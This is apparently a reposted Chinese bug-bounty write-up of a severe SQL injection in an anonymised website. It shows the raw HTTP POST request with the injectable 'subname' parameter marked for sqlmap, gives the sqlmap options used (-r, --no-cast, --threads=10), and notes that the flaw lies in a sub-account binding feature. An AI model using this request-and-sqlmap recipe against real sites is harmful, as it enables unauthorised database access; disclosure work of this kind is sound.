码迷,mamicode.com
首页 > 数据库 > 详细

【严重】XXXX网SQL注入

时间:2018-01-12 17:45:26      阅读:170      评论:0      收藏:0      [点我收藏+]

标签:取消   模拟   广度   ref   扫描器   爬虫   class   aaa   账号管理   

RANK  80

金币    100

数据包

POST xxxx/sendapp HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: XXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: XXXXX
DNT: 1
Connection: close

subname=admin*&group=1

 

参数subname可注入,直接将数据包存为txt ,-r ,--no-cast --threads=10就好了

用了很久的no-cast,还没有细查过什么意思。有一句解释是这样的:

默认情况下,sqlmap榨取数据时会将所有结果转换为字符串,并用空格替换NULL结果

老版本mysql数据库对此提取不到数据,因而需要该参数取消这个默认处理方式

 

注入点,还是在于扫描器爬虫的深度和广度、模拟登录载入cookie、token等

后来查看了一下,原来位置是在 账号管理功能模块的绑定账号,即A账号绑定子账号B,B的名字可注入。这个点,确实一般的扫描器会扫么是个问题。挖洞还是在于去钻吧。

 

【严重】XXXX网SQL注入

标签:取消   模拟   广度   ref   扫描器   爬虫   class   aaa   账号管理   

原文地址:https://www.cnblogs.com/huim/p/8276907.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!